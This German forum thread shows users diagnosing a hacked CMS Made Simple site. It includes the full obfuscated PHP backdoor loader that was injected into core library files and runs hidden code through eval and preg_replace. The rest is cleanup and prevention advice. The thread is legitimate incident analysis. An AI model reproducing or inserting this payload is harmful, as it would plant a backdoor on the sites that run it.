[GELÖST] Backend wirft leere Seite

PatriziaF · 15. September 2015 13:34

Hallo liebe Cmsler,

von einem Tag auf den anderen wirft das Backend auf einmal eine weiße Seite.
Der Redirect auf /admin/login.php funktioniert noch - aber es bleibt alles weiß

Mit debug modus sehe ich folgende Fehlermeldung:

Fatal error: Cannot redeclare CmsAdminThemeBase::get_navigation_tree() in /home/www/p202135/html/website/lib/classes/class.CmsAdminThemeBase.php on line 1366

Kann mir jemand weiterhelfen, was da schief gelaufen ist?

DANKE u LG
Patrizia

Andynium · 15. September 2015 15:29

PatriziaF schrieb:

von einem Tag auf den anderen wirft das Backend auf einmal eine weiße Seite.
Der Redirect auf /admin/login.php funktioniert noch - aber es bleibt alles weiß

Arg seltsam!

Hat evtl. der Hoster von einem Tag auf den anderen seine Server-Struktur geändert?

Welche CMSMS- und PHP-Version verwendet dein Kunde? Hast du mal manuell alle Verzeichnisse unterhalb /tmp geleert? Prüfsumme kontrolliert?

Alternativ ... verwendet die CMSMS-Installation die Minimal-Config?

http://www.cmsmadesimple.de/forum/viewt … 525#p28525

Damit entgehst du dem Pfad-Dschungel big_smile .

PatriziaF · 15. September 2015 16:35

cyberman schrieb:

Hat evtl. der Hoster von einem Tag auf den anderen seine Server-Struktur geändert?

nein - hab extra schon nachgefragt- mehrmals ;-)

cyberman schrieb:

Welche CMSMS- und PHP-Version verwendet dein Kunde? Hast du mal manuell alle Verzeichnisse unterhalb /tmp geleert? Prüfsumme kontrolliert?

ad Prüfsumme: ich denke schon - ist schon wieder etwas her ;-) aber bis vorm Wochenende hat ja auch noch alles einwandfrei funktioniert - seit 2 Jahren :-P

ad Version: PHP = 5.4.3; CMS = 1.11.7 (wird jetzt mit den aktuellen Erweiterungen wieder aktualisiert)

ad Verzeichnisse: ja (cache und templates_c)

cyberman schrieb:

Alternativ ... verwendet die CMSMS-Installation die Minimal-Config?
http://www.cmsmadesimple.de/forum/viewt … 525#p28525
Damit entgehst du dem Pfad-Dschungel .

türlich ;-)

LG Patrizia

Andynium · 15. September 2015 16:46

PatriziaF schrieb:

bis vorm Wochenende hat ja auch noch alles einwandfrei funktioniert

Vorm Wochenende?

So etwas macht mich immer etwas stutzig - denk da irgendwie immer gleich an nicht ausgelastete Script-Kiddies, die da versuchen, sich das WE zu versüßen.

Daher die Frage - /admin Ordner noch mal komplett neu hochgeladen (im Binär-Modus)?

Welche Module sind da am Laufen? Ist genügend Speicher vorhanden (für den Prozessor, nicht auf der Festplatte wink )?

NaN · 15. September 2015 17:23

Daher die Frage - /admin Ordner noch mal komplett neu hochgeladen (im Binär-Modus)?

Warum den Admin-Ordner?
Der Fehler ist doch in lib/classes/... :

Fatal error: Cannot redeclare CmsAdminThemeBase::get_navigation_tree() in /home/www/p202135/html/website/lib/classes/class.CmsAdminThemeBase.php on line 1366

Die Funktion get_navigation_tree() ist aber nicht in Zeile 1366 sondern in Zeile 893.
Und im ganzen System gibt es normalerweise keine weitere Funktion mit diesem Namen.
Klingt sehr verdächtig.

Andynium · 15. September 2015 17:54

Pfff, auch wieder wahr ... ich guck wohl heute schon zu lange auf den Monitor ops und war total auf das AdminTheme fixiert.

Fatal error: Cannot redeclare CmsAdminThemeBase::get_navigation_tree() in /home/www/p202135/html/website/lib/classes/class.CmsAdminThemeBase.php on line 1366

NaN · 15. September 2015 18:31

Außerdem vermisse ich in der Fehlermeldung den Teil, der sagt, wo die bemängelte Funktion bereits definiert wurde. Normalerweise steht dann da sowas wie "(previously declared in ...)" Das passiert eigentlich nur dann, wenn die Funktion innerhalb der Klasse doppelt vorkommt. Ist aber eigentlich nicht der Fall.

PatriziaF · 15. September 2015 20:59

ad Module: boah. nachdem ich grad nicht ins backend komme mal aus dem Oberstübchen ohne Gewähr: FEU, MLE Cms, Slideshow Modul + Slideshow Flexslider, Unternehmerverzeichnis inkl. google Maps kopplung, Toolbox, filebrowser download tag, TinyMCE, CGExtensions, Sitemapmadesimple

ad server: das ist ein server der für einen shop ausgerichtet ist, der aktuell noch nicht läuft. das heißt das sollte meiner meinung nach auch kein thema sein.

soll ich mal das lib verzeichnis neu einspielen oder nur die eine datei?

danke jungs für euer feedback und eure hilfe!

NaN · 16. September 2015 07:45

soll ich mal das lib verzeichnis neu einspielen oder nur die eine datei?

Zunächst: Überprüfe die Datei und vergleiche mit dem Original.
(Änderungsdatum und Inhalt)
Es muss einen Grund geben, warum die Datei plötzlich nicht mehr dem Original entspricht.
Aus dem Unterschied der beiden Dateien kann man dann evtl. Rückschlüsse ziehen was in etwa passiert ist.

Du ahnst es vielleicht schon: Ich schließe einen Hack der Seite nicht aus. Wenn Du jetzt nur die Datei mit dem Original ersetzt, wissen wir nichts über die Ursachen. Und dann wissen wir auch nicht, ob das wirklich alles war.

Also erst ein bischen Detektiv spielen.

Andynium · 16. September 2015 08:53

PatriziaF schrieb:

ad Module: boah. nachdem ich grad nicht ins backend komme mal aus dem Oberstübchen ohne Gewähr:

Cheatsheet: FTP > Verzeichnis /modules gucken big_smile ...

PatriziaF · 16. September 2015 12:33

also ich hab einzelne Dateien gefunden (wie zb class.cms_content_tree.php oder class.cms_route_manager.php) die am 15.09.15 um 06:42:00 bearbeitet wurden - das sieht also ganz nach hack aus.

die datei class.cmsAdminThemeBase.php hingegen hat nach wie vor das Datum 20.8.2013.

das wäre jetzt dann die 10.Seite innerhalb von einigen Wochen die gehackt wurde. Habt ihr eine Idee was ich dagegen machen kann und/oder woher das kommt?
(die liegen alle auf unterschiedlichen servern - ein teil liegt bei mir und ein teil bei diversen anderen servern)

Wie soll ich da jetzt vorgehen? einfach die Dateien überschreiben die ein Änderungsdatum von gestern früh hatten?

ich arbeite jetzt seit fast 10 jahren mit cms made simple --> und bis vor kurzem wurde ich noch nie gehackt.

ICH DANKE EUCH FÜR EURE HILFE!

@cyberman: lol - hab ich mal wieder mit dem arsch nachgedacht. danke für den cheatsheet :-P

Andynium · 16. September 2015 13:05

PatriziaF schrieb:

Habt ihr eine Idee was ich dagegen machen kann und/oder woher das kommt?

Würde mal sagen, du brauchst dich erst mal nicht mehr über zu wenig Arbeit beschweren big_smile

http://www.cmsmadesimple.de/forum/viewt … 536#p14536
http://www.cmsmadesimple.de/forum/viewtopic.php?id=18
http://www.cmsmadesimple.de/forum/viewtopic.php?id=765

Ganz wichtig - auch Fremdscripte kontrollieren/aktualisieren (du sprachst von einem Shop).

PatriziaF · 16. September 2015 13:35

oh mann!

wer zahlt mir den scheiß? :-D

NaN · 16. September 2015 14:36

also ich hab einzelne Dateien gefunden (wie zb class.cms_content_tree.php oder class.cms_route_manager.php) die am 15.09.15 um 06:42:00 bearbeitet wurden - das sieht also ganz nach hack aus.
die datei class.cmsAdminThemeBase.php hingegen hat nach wie vor das Datum 20.8.2013.

Wie sehen diese Dateien denn "von innen" aus?
Hast Du sie mal mit dem jeweiligen Original verglichen?

PatriziaF · 16. September 2015 16:07

NaN schrieb:

Wie sehen diese Dateien denn "von innen" aus?
Hast Du sie mal mit dem jeweiligen Original verglichen?

sie haben alle nach dem <?php folgenden code stehen:

Hier klicken, um den Code zum Kopieren zu markieren

[== PHP ==]
if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $fzhjsnyazu = '2]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%x5c47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y825o:W%x5c%x7825c:>1<%x5c%x7825bf!>>%x5c%x7822!pd%x5c%x787gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x7#)zbssb!>!ssbnpe_GMFT%x5cc%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)dXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7ord($n)-1);} @error_reporting(0dfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvof)fepdof%x5c%x786057ftbc%T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudovg%x55]274]y4:]82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5973:8297f:5297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278%x5c%x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c<%x5c%x7825j,,*!|%x5c%x7824-%x5c%x7825c%x785cSFWSFT%x5c%x7860%x5c%x7825E{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%x2!>#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78223x7878pmpusut!-#j0#!%x5986+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x75w:!>!%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827hA)3of>2bd%x5c%x7825!<5h%x5c%x82f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x52]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73"156%x75%156%x61"]=1; function fjfgg($n){return chr(x7825)s%x5c%x7825>%x5c%25%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%y)#}#-#%x5c%x7824-%x5c%x7824-#O#-#N#*%x5c%x7824%x5c%x7w6Z6<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256%x5c%x7825j=tj{fpg)%x5c%x782532M3]317]445]212]445]43]321]464]284]364]6]234]342}!+!<+{e%x5c%x7825+*!*+fepdfe{h+7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782f5cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepnx5c%x78256<*Y%x5c%x7825)fnb!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.>!}_;gvc%x5c%x7825}&;ftmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824-%x5c%x7824]y8%x5]27]28y]#%x5c%x782fr%x5y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]y75c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euc%x78256~6<%x5c%x787fw6<*K)ftpm%x5c%x7825#%x5c%x782%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%); preg_replace("%x2f%50%x2e%52%x29%57%x65","%x65%166%x61%56#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x78d]53]Kc]55Ld]55#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy85cq%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%{d%x5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqm*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)ux5c%x7825bT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%xx7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5cK3#<%x5c%x7825yy>#]D6]281L1#%5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%x)%x5c%x7825z>>2*!%x5c%x7825zx7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2c%x7825!<*::::::-111112)eobs%x5c%x7860un>qp%x5c%x7825!|Z~!<##!>k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd#00;quui#>.%x5c%x7825!<***f%x5c%x7x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c1^-%x5cctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%xc%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53L5c%x7825j=6[%x5c%x7825wwf!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c%x7878pmpus5c%x787f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6ufs!|ftmf!~<**9.-j%x5c%x7825-bubx72%162%x61%171%x5f%155%x61%16c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x782%x5c%x7825)dfyfR%x5c%256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x78256<C%x5827;%x5c%x7825!<*#}_;#)323l%x5c%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x78x7827!hmg%x5c%x7825)!gj!|!*1?hmg%!2p%x5c%x7825!|!*!***b%x5c%x7825)sf%x5c%]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]87f%x5c%x787f%x5c%x787f%xtjm6<%x5c%x787fw6*CW&)5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]y3d]51]y3mpef)#%x5c%x7824*<!%x:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%xx782fh%x5c%x7825:<**#57]38y]47]67y]37]88yc%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#ttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x78ozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x7%x5c%x7824gps)%x5c%x7825j>1<<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c%x786]277#<%x5c%x7825t2w>#]y74]273]y76]250%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%25)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x78<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%5]y72]254]y76]61]y33D!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x78y72]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]26*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*68]322]3]364]6]283]427]36]373P6]36]73]83]23827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%xx5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3c%x7827pd%x5c%x78256|6.7eu{66~67<&w6<f#o]#%x5c%x782f*)323zbe!-#jty7d]252]y74]256#<!%x5c%x7825ff2!>782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2*#cd2bge56+99386c6f+9f5d816:+946:ce444gvodujpo!%x5c%x7824-%x5c%x7824]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x]#>m%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!~<ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%xut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x7825t2w)##Qtj7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%*#k#)tutjyf%x5c%x7860%x5c%x7878%xQi%x5c%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x782ji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78257-K)fujrfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%bg}%x5c%x787f;!osvufs}w;*%x5c%x7876]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]2878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]472]x7825b:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:.2^,>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x760gvodujpo)##-!#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSV%x7878:-!%x5c%x7825tzw%x5c%x70*?]+^?]_%x5c%x785c}X%x7825!**X)ufttj%x5c%x7822)gj7827,*b%x5c%x7827)fepdof.)fy3:]68]y76#<%x5c%x78e%x5c%x78b%x5c%x78278;0]=])0#)U!%x5c%x7827{**u%x5c%x7825-#jt0}Z;0]=]0]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]8if((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset154%x28%151%x6d%160%x6c%157%x64%145%x28%141%%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824w)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825t27&6<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c7825:osvufs:~:<*9-1-r%x5c%6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]pD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{*epdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7825>5h%x57827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825j>1<%x%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%5c%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]3256]y78]248]y83]256]y81]2656]y39]252]y83]273]y72]282#<%x7825tww!>!%x5c%x782400~:<h%x5c%x7825_t%x5c%xc%x7822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7825Z<^2%x55)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>22f#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hojepdoF.uofuos%x5c%x7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7+I#)q%x5c%x7825:>:r%x5c%x7x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]7825!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutpd%x5c%x78256<pd%x5c%x7825825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7x5c%x78256<%x5c%x787fw6*%x5c%x7825!*3!%x5c%x7827!hmg%x5cc%x7860439275ttfsqnpdov{h19275j{x5c%x7824<!%x5c%x7825tzw>!#]y76]277]8M7]381]211M5]67]452]88]5]48]822)7gj6<*QDU%x5c%x786zbssb!-#}#)fepmqnj!%x5c%x782x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,82f%x5c%x7824)#P#-#Q#-#B#-#x70%154%x69%164%50%x22%1382f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fm60opjudovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osv37y]672]48y]#>s%x5c%x7825<#462]y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)j{5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%xX&Z&S{ftmfV%x5c%x787f<*XAZASVx5c%x7825)!gj!<**2-4-bubE{h%x5c%%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x7825)<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%825)!gj!<2,*j%x5c%x7825-#1]#-<*doj%x5c%x78257-C)fepmqnjA%x5c%x78824-%x5c%x7824-!%x5c%x7825%x5, NULL); }y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5cc%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tv!bssbz)%x5c%x7824]25%x5c%x74%x78%62%x35%165%x3a%%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)ufc%x7824-%x5c%x7824*!|!%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*idufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5q%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2q%x5c%x7825<#%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV787fw6*CW&)7gj6<.[A%x<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782f5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1<!fmtf!%x5c%%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB0MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%xtpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7/(.*)/epreg_replacedpsouwslbg'; $lyjozvjhga = explode(chr((281-237)),'6985,66,2182,55,1235,51,336,31,2237,58,7051,44,3813,30,4704,56,8742,25,9447,21,7471,56,6837,39,1044,68,8350,26,1412,42,4615,52,3915,63,5474,37,2838,49,4265,22,159,39,8767,49,6137,49,8188,50,6186,70,2067,31,291,45,8598,22,9966,55,3031,59,5979,57,1689,27,4539,48,2543,59,680,49,9468,52,4498,41,1309,49,8445,26,3720,61,9195,35,7236,40,2602,62,9545,56,3894,21,8648,67,7302,66,5178,49,9783,21,1987,38,3242,50,2118,64,6678,53,4876,50,4926,30,1835,24,6323,34,134,25,4760,38,8816,47,3781,32,800,58,8471,30,9067,51,10062,44,9166,29,2364,68,5817,38,8308,42,6632,46,4112,33,9035,32,3118,61,8894,60,501,54,7958,66,3843,51,8024,55,2025,42,1112,30,1564,57,3292,34,5319,38,6810,27,7565,47,3179,63,4145,40,956,22,223,68,8620,28,3651,69,5855,55,5611,37,198,25,9929,37,9721,62,4005,64,4798,58,6782,28,5409,65,424,26,7415,56,766,34,4069,43,8079,57,3978,27,367,57,9601,53,8501,32,2664,41,902,54,1532,32,2705,69,6513,53,4240,25,5227,49,9006,29,9804,65,9654,67,8136,52,7527,38,6036,33,8954,52,7612,69,6876,50,7368,47,2098,20,5511,28,6760,22,8533,36,5125,53,7884,28,1716,59,1946,41,4667,37,0,52,7912,46,7276,26,1286,23,4415,41,1923,23,4456,42,8238,26,8376,69,6404,63,8863,31,52,50,5748,69,7095,62,8264,44,5539,33,9420,27,9230,29,9520,25,9357,63,3396,51,1358,29,2774,64,1859,64,7157,42,729,37,5648,31,9269,37,4587,28,1454,29,5085,40,6566,66,4334,21,4287,47,555,60,4956,59,6069,68,1621,68,9306,51,7743,63,3326,70,5910,69,7199,37,3447,55,1775,60,615,65,5015,70,4185,55,3002,29,5357,52,6357,47,3562,65,2474,69,9118,48,2887,64,7806,52,5276,43,8569,29,1483,49,5679,69,5572,39,978,66,102,32,4355,60,9869,60,6467,46,10021,41,2432,42,7681,62,3627,24,858,44,3090,28,6256,67,2951,51,6731,29,8715,27,450,51,1387,25,1142,47,3502,60,2295,69,7858,26,4856,20,6926,59,1189,46,9259,10'); $yjjlpvdnud=substr($fzhjsnyazu,(38633-28527),(43-36)); if (!function_exists('rjnmkzckpt')) { function rjnmkzckpt($evbizutmjb, $friqwuzbga) { $tuewhvnvpx = NULL; for($qjfbhgdxda=0;$qjfbhgdxda<(sizeof($evbizutmjb)/2);$qjfbhgdxda++) { $tuewhvnvpx .= substr($friqwuzbga, $evbizutmjb[($qjfbhgdxda*2)],$evbizutmjb[($qjfbhgdxda*2)+1]); } return $tuewhvnvpx; };} $uxunxldwtk="\x20\57\x2a\40\x76\141\x64\170\x70\144\x74\144\x69\167\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\62\x31\55\x38\64\x29\51\x2c\40\x63\150\x72\50\x28\65\x39\70\x2d\65\x30\66\x29\51\x2c\40\x72\152\x6e\155\x6b\172\x63\153\x70\164\x28\44\x6c\171\x6a\157\x7a\166\x6a\150\x67\141\x2c\44\x66\172\x68\152\x73\156\x79\141\x7a\165\x29\51\x29\73\x20\57\x2a\40\x62\156\x63\144\x73\164\x77\164\x75\171\x20\52\x2f\40"; $dtnuaeecvg=substr($fzhjsnyazu,(63101-52988),(84-72)); $dtnuaeecvg($yjjlpvdnud, $uxunxldwtk, NULL); $dtnuaeecvg=$uxunxldwtk; $dtnuaeecvg=(542-421); $fzhjsnyazu=$dtnuaeecvg-1; ?><?php

bzw. ich hab nicht überprüft ob in jeder datei derselbe code steht.

Andynium · 16. September 2015 16:32

PatriziaF schrieb:

oh mann!
wer zahlt mir den scheiß? :-D

Ganz einfach, in die monatliche Service Gebühr ein regelmäßiges Backup einpreisen und bei Bedarf die letzte saubere Version hochladen wink .

By the way - eindeutiges Ja. Gehackt.

PatriziaF · 16. September 2015 16:37

ja ich bin gerade dabei, eine wartungspauschale zu vereinbaren (bzw. dieser kunde hat diese vor ca. 2 wochen unterschrieben mit der bedingung dass ab dem design-relaunch).

viele meiner kunden sagen jedoch: brauch ich nicht :-(

ad gehackt: oleeee. soll ich mich jetzt freuen? :-D

Danke jungs auf alle fälle für euer rasches, nettes und super kompetentes feedback!
und natürlich für die arbeitbringenden links :-P

damit stell ich den beitrag mal auf gelöst.
das backend läuft wieder - ich hab im ersten quick and dirty modus mal den lib ordner überschrieben (vorher hab ich mir die ganzen ftp daten "gesichert") und die dateien die unerlaubter weise dazugekommen sind gelöscht.

lg

Andynium · 16. September 2015 16:51

PatriziaF schrieb:

viele meiner kunden sagen jedoch: brauch ich nicht :-(

Dann hast du jetzt die Argumente, sie davon doch noch zu überzeugen.

Bei Google wegen Malware auf der Webseite ausgelistet zu werden, dürfte sie deutlich teurer zu stehen kommen.

ad gehackt: oleeee. soll ich mich jetzt freuen? :-D

Na klar.

Wieder etwas dazu gelernt. Eigene Kompetenz erhöht.

faglork · 17. September 2015 10:59

Gelöst nur in dem Sinne dass die *Folgen* des Hacks z.t. beseitigt sind.

Sehr wichtig wäre auch die Frage, WIE der Hack vor sich ging bzw. wo die Schwachstelle sitzt.

Du kennst doch das Datum an dem die Dateien verändert wurden. Durchforste mal das access und das error log nach diesem Datum/Uhrzeit und schau mal was in dem Zeitraum passiert ist.

Wenn die Sicherheitslücke nicht behoben wird, wirst das System oftmals erneut gehackt, die Lücke ist den Angreifern ja bekannt ...

Und: es wäre nett wenn du auch das posten würdest ... es besteht ja durchaus die Möglichkeit, dass es kein bekannter Hack ist ... eventuell auch ein dummer Zufall, irgendeine kleine Unachtsamkeit etc.

